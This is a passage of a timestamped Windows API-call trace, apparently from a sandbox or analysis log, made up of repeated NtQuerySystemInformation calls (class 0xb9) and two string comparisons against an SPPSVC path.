Length=0x0, ResultLength=0x0) [0243.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe030, Length=0x28, ResultLength=0x0) [0243.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe030, Length=0x28, ResultLength=0x0) [0243.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe030, Length=0x28, ResultLength=0x0) [0243.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0a0, Length=0x28, ResultLength=0x0) [0243.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe200, Length=0x38, ResultLength=0x0) [0243.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x28, ResultLength=0x0) [0243.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe120, Length=0x28, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe200, Length=0x38, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x20, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe000, Length=0x20, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe000, Length=0x20, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe000, Length=0x20, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe200, Length=0x38, ResultLength=0x0) [0243.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe080, Length=0x20, ResultLength=0x0) [0243.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe010, Length=0x20, ResultLength=0x0) [0243.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe010, Length=0x20, ResultLength=0x0) [0243.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.864] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe490, Length=0x50, ResultLength=0x0) [0243.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe410, Length=0x28, ResultLength=0x0) [0243.865] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0243.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe490, Length=0x50, ResultLength=0x0) [0243.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe490, Length=0x50, ResultLength=0x0) [0243.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe490, Length=0x50, ResultLength=0x0) [0243.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0243.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1f0, Length=0x28, ResultLength=0x0) [0243.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1f0, Length=0x28, ResultLength=0x0) [0243.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1f0, Length=0x28, ResultLength=0x0) [0243.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe260, Length=0x28, ResultLength=0x0) [0243.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0243.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2e0, Length=0x28, ResultLength=0x0) [0243.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2e0, Length=0x28, ResultLength=0x0) [0243.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0243.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe240, Length=0x20, ResultLength=0x0) [0243.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1c0, Length=0x20, ResultLength=0x0) [0243.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1c0, Length=0x20, ResultLength=0x0) [0243.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1c0, Length=0x20, ResultLength=0x0) [0243.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe240, Length=0x20, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1d0, Length=0x20, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1d0, Length=0x20, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe490, Length=0x50, ResultLength=0x0) [0243.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe410, Length=0x28, ResultLength=0x0) [0243.876] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0243.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe490, Length=0x50, ResultLength=0x0) [0243.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe490, Length=0x50, ResultLength=0x0) [0243.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe490, Length=0x50, ResultLength=0x0) [0243.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0243.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1f0, Length=0x28, ResultLength=0x0) [0243.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1f0, Length=0x28, ResultLength=0x0) [0243.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1f0, Length=0x28, ResultLength=0x0) [0243.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe260, Length=0x28, ResultLength=0x0) [0243.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0243.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2e0, Length=0x28, ResultLength=0x0) [0243.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe2e0, Length=0x28, ResultLength=0x0) [0243.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0243.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe240, Length=0x20, ResultLength=0x0) [0243.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1c0, Length=0x20, ResultLength=0x0) [0243.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1c0, Length=0x20, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1c0, Length=0x20, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe3c0, Length=0x38, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe240, Length=0x20, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1d0, Length=0x20, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe1d0, Length=0x20, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0f0, Length=0x50, ResultLength=0x0) [0243.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0f0, Length=0x50, ResultLength=0x0) [0243.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe0f0, Length=0x50, ResultLength=0x0) [0243.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x50, ResultLength=0x0) [0243.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x50, ResultLength=0x0) [0243.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x50, ResultLength=0x0) [0243.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdfe0, Length=0x50, ResultLength=0x0) [0243.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf10, Length=0x38, ResultLength=0x0) [0243.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd40, Length=0x28, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd40, Length=0x28, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd40, Length=0x28, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd40, Length=0x28, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efddb0, Length=0x28, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf10, Length=0x38, ResultLength=0x0) [0243.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde30, Length=0x28, ResultLength=0x0) [0243.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efde30, Length=0x28, ResultLength=0x0) [0243.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdcd0, Length=0x20, ResultLength=0x0) [0243.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdc50, Length=0x20, ResultLength=0x0) [0243.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdc50, Length=0x20, ResultLength=0x0) [0243.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdc50, Length=0x20, ResultLength=0x0) [0243.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf10, Length=0x38, ResultLength=0x0) [0243.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdf10, Length=0x38, ResultLength=0x0) [0243.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd90, Length=0x20, ResultLength=0x0) [0243.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd20, Length=0x20, ResultLength=0x0) [0243.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efdd20, Length=0x20, ResultLength=0x0) [0243.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe340, Length=0x50, ResultLength=0x0) [0243.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe340, Length=0x50, ResultLength=0x0) [0243.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0243.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751efe340, Length=0x50, ResultLength=0x0) [0243.900] 